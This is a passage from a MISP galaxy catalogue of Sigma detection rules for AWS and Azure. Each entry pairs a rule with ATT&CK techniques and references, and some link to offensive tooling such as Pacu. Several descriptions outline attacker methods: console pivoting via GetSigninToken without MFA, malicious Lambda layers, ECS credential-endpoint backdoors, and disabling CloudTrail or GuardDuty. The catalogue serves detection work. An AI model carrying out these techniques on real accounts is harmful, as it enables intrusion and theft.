The tag is: misp-galaxy:sigma-rules="AWS STS AssumeRole Misuse"

AWS STS AssumeRole Misuse has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Use Alternate Authentication Material - T1550" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Application Access Token - T1550.001" with estimative-language:likelihood-probability="almost-certain"

Table 11233. Table References

Links

https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html

https://github.com/elastic/detection-rules/pull/1214

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_sts_assumerole_misuse.yml

AWS RDS Master Password Change

Detects a change of the database master password. It may be a part of data exfiltration.

The tag is: misp-galaxy:sigma-rules="AWS RDS Master Password Change"

AWS RDS Master Password Change has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"

Table 11234. Table References

Links

https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rdsexplore_snapshots/main.py

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_rds_change_master_password.yml

AWS ElastiCache Security Group Modified or Deleted

Identifies when an ElastiCache security group has been modified or deleted.

The tag is: misp-galaxy:sigma-rules="AWS ElastiCache Security Group Modified or Deleted"

AWS ElastiCache Security Group Modified or Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Access Removal - T1531" with estimative-language:likelihood-probability="almost-certain"

Table 11235. Table References

Links

https://github.com/elastic/detection-rules/blob/7d5efd68603f42be5e125b5a6a503b2ef3ac0f4e/rules/integrations/aws/impact_elasticache_security_group_modified_or_deleted.toml

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_elasticache_security_group_modified_or_deleted.yml

AWS Suspicious SAML Activity

Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML.

The tag is: misp-galaxy:sigma-rules="AWS Suspicious SAML Activity"

AWS Suspicious SAML Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Use Alternate Authentication Material - T1550" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Application Access Token - T1550.001" with estimative-language:likelihood-probability="almost-certain"

Table 11236. Table References

Links

https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html

https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_susp_saml_activity.yml

AWS EKS Cluster Created or Deleted

Identifies when an EKS cluster is created or deleted.

The tag is: misp-galaxy:sigma-rules="AWS EKS Cluster Created or Deleted"

AWS EKS Cluster Created or Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"

Table 11237. Table References

Links

https://any-api.com/amazonaws_com/eks/docs/API_Description

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_eks_cluster_created_or_deleted.yml

Restore Public AWS RDS Instance

Detects the recovery of a new public database instance from a snapshot. It may be a part of data exfiltration.

The tag is: misp-galaxy:sigma-rules="Restore Public AWS RDS Instance"

Restore Public AWS RDS Instance has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"

Table 11238. Table References

Links

https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rdsexplore_snapshots/main.py

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_rds_public_db_restore.yml

AWS IAM S3Browser Templated S3 Bucket Policy Creation

Detects S3 browser utility creating Inline IAM policy containing default S3 bucket name placeholder value of "<YOUR-BUCKET-NAME>".

The tag is: misp-galaxy:sigma-rules="AWS IAM S3Browser Templated S3 Bucket Policy Creation"

AWS IAM S3Browser Templated S3 Bucket Policy Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud API - T1059.009" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11239. Table References

Links

https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_iam_s3browser_templated_s3_bucket_policy_creation.yml

AWS CloudTrail Important Change

Detects disabling, deleting and updating of a Trail.

The tag is: misp-galaxy:sigma-rules="AWS CloudTrail Important Change"

AWS CloudTrail Important Change has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 11240. Table References

Links

https://docs.aws.amazon.com/awscloudtrail/latest/userguide/best-practices-security.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_cloudtrail_disable_logging.yml

AWS EC2 Startup Shell Script Change

Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up.

The tag is: misp-galaxy:sigma-rules="AWS EC2 Startup Shell Script Change"

AWS EC2 Startup Shell Script Change has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"

Table 11241. Table References

Links

https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2startup_shell_script/main.py#L9

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_ec2_startup_script_change.yml

Potential Bucket Enumeration on AWS

Looks for potential enumeration of AWS buckets via ListBuckets.

The tag is: misp-galaxy:sigma-rules="Potential Bucket Enumeration on AWS"

Potential Bucket Enumeration on AWS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Infrastructure Discovery - T1580" with estimative-language:likelihood-probability="almost-certain"

Table 11242. Table References

Links

https://jamesonhacking.blogspot.com/2020/12/pivoting-to-private-aws-s3-buckets.html

https://github.com/Lifka/hacking-resources/blob/c2ae355d381bd0c9f0b32c4ead049f44e5b1573f/cloud-hacking-cheat-sheets.md

https://securitycafe.ro/2022/12/14/aws-enumeration-part-ii-practical-enumeration/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_enum_buckets.yml

AWS User Login Profile Was Modified

An attacker with the iam:UpdateLoginProfile permission on other users can change the password used to log in to the AWS console for any user that already has a login profile set up. This alert detects anyone changing a password on behalf of another user.

The tag is: misp-galaxy:sigma-rules="AWS User Login Profile Was Modified"

AWS User Login Profile Was Modified has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 11243. Table References

Links

https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_update_login_profile.yml

AWS EC2 VM Export Failure

An attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance.

The tag is: misp-galaxy:sigma-rules="AWS EC2 VM Export Failure"

AWS EC2 VM Export Failure has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Transfer Data to Cloud Account - T1537" with estimative-language:likelihood-probability="almost-certain"

Table 11244. Table References

Links

https://docs.aws.amazon.com/vm-import/latest/userguide/vmexport.html#export-instance

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_ec2_vm_export_failure.yml

AWS Identity Center Identity Provider Change

Detects a change in the AWS Identity Center (formerly AWS SSO) identity provider. A change in identity provider allows an attacker to establish persistent access or escalate privileges via user impersonation.

The tag is: misp-galaxy:sigma-rules="AWS Identity Center Identity Provider Change"

AWS Identity Center Identity Provider Change has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Authentication Process - T1556" with estimative-language:likelihood-probability="almost-certain"

Table 11245. Table References

Links

https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsiamidentitycentersuccessortoawssinglesign-on.html

https://docs.aws.amazon.com/singlesignon/latest/userguide/app-enablement.html

https://docs.aws.amazon.com/singlesignon/latest/userguide/sso-info-in-cloudtrail.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_sso_idp_change.yml

AWS STS GetSessionToken Misuse

Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges.

The tag is: misp-galaxy:sigma-rules="AWS STS GetSessionToken Misuse"

AWS STS GetSessionToken Misuse has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Use Alternate Authentication Material - T1550" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Application Access Token - T1550.001" with estimative-language:likelihood-probability="almost-certain"

Table 11246. Table References

Links

https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html

https://github.com/elastic/detection-rules/pull/1213

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_sts_getsessiontoken_misuse.yml

AWS ECS Task Definition That Queries The Credential Endpoint

Detects when an Elastic Container Service (ECS) Task Definition includes a command to query the credential endpoint. This can indicate a potential adversary adding a backdoor to establish persistence or escalate privileges.

The tag is: misp-galaxy:sigma-rules="AWS ECS Task Definition That Queries The Credential Endpoint"

AWS ECS Task Definition That Queries The Credential Endpoint has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Implant Internal Image - T1525" with estimative-language:likelihood-probability="almost-certain"

Table 11247. Table References

Links

https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecsbackdoor_task_def/main.py

https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-iam-roles.html

https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_ecs_task_definition_cred_endpoint_query.yml

AWS IAM S3Browser LoginProfile Creation

Detects the S3 Browser utility performing reconnaissance for existing IAM users without a LoginProfile defined and then, when one is found, creating a LoginProfile.

The tag is: misp-galaxy:sigma-rules="AWS IAM S3Browser LoginProfile Creation"

AWS IAM S3Browser LoginProfile Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud API - T1059.009" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11248. Table References

Links

https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_iam_s3browser_loginprofile_creation.yml

AWS GuardDuty Important Change

Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs.

The tag is: misp-galaxy:sigma-rules="AWS GuardDuty Important Change"

AWS GuardDuty Important Change has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 11249. Table References

Links

https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/guarddutywhitelist_ip/main.py#L9

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_guardduty_disruption.yml

AWS Attached Malicious Lambda Layer

Detects when a user attaches a Lambda layer to an existing function to override a library that is in use by the function, where their malicious code could use the function’s IAM role for AWS API calls. This would give an adversary access to the privileges associated with the Lambda service role that is attached to that function.

The tag is: misp-galaxy:sigma-rules="AWS Attached Malicious Lambda Layer"

Table 11250. Table References

Links

https://docs.aws.amazon.com/lambda/latest/dg/API_UpdateFunctionConfiguration.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_attached_malicious_lambda_layer.yml

AWS Route 53 Domain Transfer Lock Disabled

Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar.

The tag is: misp-galaxy:sigma-rules="AWS Route 53 Domain Transfer Lock Disabled"

AWS Route 53 Domain Transfer Lock Disabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 11251. Table References

Links

https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html

https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml

https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_route_53_domain_transferred_lock_disabled.yml

AWS EFS Fileshare Modified or Deleted

Detects when an EFS file share is modified or deleted. You can’t delete a file system that is in use. If the file system has any mount targets, the adversary must first delete them, so deletion of a mount target will occur before deletion of the file share.

The tag is: misp-galaxy:sigma-rules="AWS EFS Fileshare Modified or Deleted"

Table 11252. Table References

Links

https://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_efs_fileshare_modified_or_deleted.yml

AWS Console GetSigninToken Potential Abuse

Detects potentially suspicious events involving "GetSigninToken". An adversary using the "aws_consoler" tool can leverage this console API to create temporary federated credentials that help obfuscate which AWS credential is compromised (the original access key) and enable the adversary to pivot from the AWS CLI to console sessions without the need for MFA, using the new access key issued in this request.

The tag is: misp-galaxy:sigma-rules="AWS Console GetSigninToken Potential Abuse"

AWS Console GetSigninToken Potential Abuse has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Services - T1021.007" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Application Access Token - T1550.001" with estimative-language:likelihood-probability="almost-certain"

Table 11253. Table References

Links

https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/

https://github.com/NetSPI/aws_consoler

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_console_getsignintoken.yml

AWS Root Credentials

Detects AWS root account usage

The tag is: misp-galaxy:sigma-rules="AWS Root Credentials"

AWS Root Credentials has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11255. Table References

Links

https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_root_account_usage.yml

AWS IAM S3Browser User or AccessKey Creation

Detects S3 Browser utility creating IAM User or AccessKey.

The tag is: misp-galaxy:sigma-rules="AWS IAM S3Browser User or AccessKey Creation"

AWS IAM S3Browser User or AccessKey Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud API - T1059.009" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11256. Table References

Links

https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_iam_s3browser_user_or_accesskey_creation.yml

AWS Config Disabling Channel/Recorder

Detects AWS Config Service disabling

The tag is: misp-galaxy:sigma-rules="AWS Config Disabling Channel/Recorder"

AWS Config Disabling Channel/Recorder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 11257. Table References

Links

https://docs.aws.amazon.com/config/latest/developerguide/cloudtrail-log-files-for-aws-config.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_config_disable_recording.yml

AWS ElastiCache Security Group Created

Detects when an ElastiCache security group has been created.

The tag is: misp-galaxy:sigma-rules="AWS ElastiCache Security Group Created"

AWS ElastiCache Security Group Created has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Create Account - T1136" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Account - T1136.003" with estimative-language:likelihood-probability="almost-certain"

Table 11258. Table References

Links

https://github.com/elastic/detection-rules/blob/598f3d7e0a63221c0703ad9a0ea7e22e7bc5961e/rules/integrations/aws/persistence_elasticache_security_group_creation.toml

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_elasticache_security_group_created.yml

AWS S3 Bucket Versioning Disable

Detects when S3 bucket versioning is disabled. Threat actors use this technique during AWS ransomware incidents prior to deleting S3 objects.

The tag is: misp-galaxy:sigma-rules="AWS S3 Bucket Versioning Disable"

AWS S3 Bucket Versioning Disable has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

Table 11259. Table References

Links

https://invictus-ir.medium.com/ransomware-in-the-cloud-7f14805bbe82

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_disable_bucket_versioning.yml

Too Many Global Admins

Identifies an event where there are too many accounts assigned the Global Administrator role.

The tag is: misp-galaxy:sigma-rules="Too Many Global Admins"

Too Many Global Admins has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11260. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#there-are-too-many-global-administrators

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_too_many_global_admins.yml

Roles Are Not Being Used

Identifies when a user has been assigned a privileged role and is not using that role.

The tag is: misp-galaxy:sigma-rules="Roles Are Not Being Used"

Roles Are Not Being Used has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11261. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#administrators-arent-using-their-privileged-roles

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_role_not_used.yml

Roles Activated Too Frequently

Identifies when the same privileged role has multiple activations by the same user.

The tag is: misp-galaxy:sigma-rules="Roles Activated Too Frequently"

Roles Activated Too Frequently has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11262. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-activated-too-frequently

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_role_frequent_activation.yml

Invalid PIM License

Identifies when an organization doesn’t have the proper license for PIM and is out of compliance.

The tag is: misp-galaxy:sigma-rules="Invalid PIM License"

Invalid PIM License has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11263. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#the-organization-doesnt-have-microsoft-entra-premium-p2-or-microsoft-entra-id-governance

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_invalid_license.yml

Roles Activation Doesn’t Require MFA

Identifies when a privileged role can be activated without performing MFA.

The tag is: misp-galaxy:sigma-rules="Roles Activation Doesn’t Require MFA"

Roles Activation Doesn’t Require MFA has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11264. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#roles-dont-require-multi-factor-authentication-for-activation

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_role_no_mfa_required.yml

Roles Assigned Outside PIM

Identifies when a privileged role assignment has taken place outside of PIM, which may indicate an attack.

The tag is: misp-galaxy:sigma-rules="Roles Assigned Outside PIM"

Roles Assigned Outside PIM has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11265. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-assigned-outside-of-privileged-identity-management

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_role_assigned_outside_of_pim.yml

Stale Accounts In A Privileged Role

Identifies when an account hasn’t signed in during the past n days.

The tag is: misp-galaxy:sigma-rules="Stale Accounts In A Privileged Role"

Stale Accounts In A Privileged Role has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11266. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#potential-stale-accounts-in-a-privileged-role

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_account_stale.yml

Use of Legacy Authentication Protocols

Alerts when legacy authentication has been used on an account.

The tag is: misp-galaxy:sigma-rules="Use of Legacy Authentication Protocols"

Use of Legacy Authentication Protocols has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

Table 11267. Table References

Links

https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_legacy_authentication_protocols.yml

Sign-in Failure Due to Conditional Access Requirements Not Met

Defines a baseline threshold for failed sign-ins due to Conditional Access failures.

The tag is: misp-galaxy:sigma-rules="Sign-in Failure Due to Conditional Access Requirements Not Met"

Sign-in Failure Due to Conditional Access Requirements Not Met has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11268. Table References

Links

https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_conditional_access_failure.yml

Applications That Are Using ROPC Authentication Flow

Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly. The application then uses those credentials to authenticate the user against the identity provider.

The tag is: misp-galaxy:sigma-rules="Applications That Are Using ROPC Authentication Flow"

Applications That Are Using ROPC Authentication Flow has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11269. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_app_ropc_authentication.yml

User Access Blocked by Azure Conditional Access

Detects when access has been blocked by Conditional Access policies. The access policy does not allow token issuance, which might be a sign of unauthorized login attempts against valid accounts.

The tag is: misp-galaxy:sigma-rules="User Access Blocked by Azure Conditional Access"

User Access Blocked by Azure Conditional Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11270. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_user_login_blocked_by_conditional_access.yml

Increased Failed Authentications Of Any Type

Detects when sign-ins increased by 10% or greater.

The tag is: misp-galaxy:sigma-rules="Increased Failed Authentications Of Any Type"

Increased Failed Authentications Of Any Type has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11271. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-failed-unusual-sign-ins

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_auth_failure_increase.yml

Users Authenticating To Other Azure AD Tenants

Detects when users in your Azure AD tenant are authenticating to other Azure AD tenants.

The tag is: misp-galaxy:sigma-rules="Users Authenticating To Other Azure AD Tenants"

Users Authenticating To Other Azure AD Tenants has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11272. Table References

Links

https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_users_authenticating_to_other_azure_ad_tenants.yml

Authentications To Important Apps Using Single Factor Authentication

Detects when authentications to important application(s) only required single-factor authentication.

The tag is: misp-galaxy:sigma-rules="Authentications To Important Apps Using Single Factor Authentication"

Authentications To Important Apps Using Single Factor Authentication has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11273. Table References

Links

https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_auth_to_important_apps_using_single_factor_auth.yml

Measurable Increase Of Successful Authentications

Detects when successful sign-ins increased by 10% or greater.

The tag is: misp-galaxy:sigma-rules="Measurable Increase Of Successful Authentications"

Measurable Increase Of Successful Authentications has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11274. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-successful-unusual-sign-ins

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_auth_sucess_increase.yml

Successful Authentications From Countries You Do Not Operate Out Of

Detects successful authentications from countries you do not operate out of.

The tag is: misp-galaxy:sigma-rules="Successful Authentications From Countries You Do Not Operate Out Of"

Successful Authentications From Countries You Do Not Operate Out Of has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

Table 11275. Table References

Links

https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml

Potential MFA Bypass Using Legacy Client Authentication

Detects successful authentication from potential clients using legacy authentication via user agent strings. This could be a sign of MFA bypass using a password spray attack.

The tag is: misp-galaxy:sigma-rules="Potential MFA Bypass Using Legacy Client Authentication"

Potential MFA Bypass Using Legacy Client Authentication has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

Table 11276. Table References

Links

https://www.microsoft.com/en-us/security/blog/2021/10/26/protect-your-business-from-password-sprays-with-microsoft-dart-recommendations/

https://blooteem.com/march-2022

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_suspicious_signin_bypassing_mfa.yml

Device Registration or Join Without MFA

Monitor and alert for device registration or join events where MFA was not performed.

The tag is: misp-galaxy:sigma-rules="Device Registration or Join Without MFA"

Device Registration or Join Without MFA has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11277. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-registrations-and-joins-outside-policy

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_device_registration_or_join_without_mfa.yml

Discovery Using AzureHound

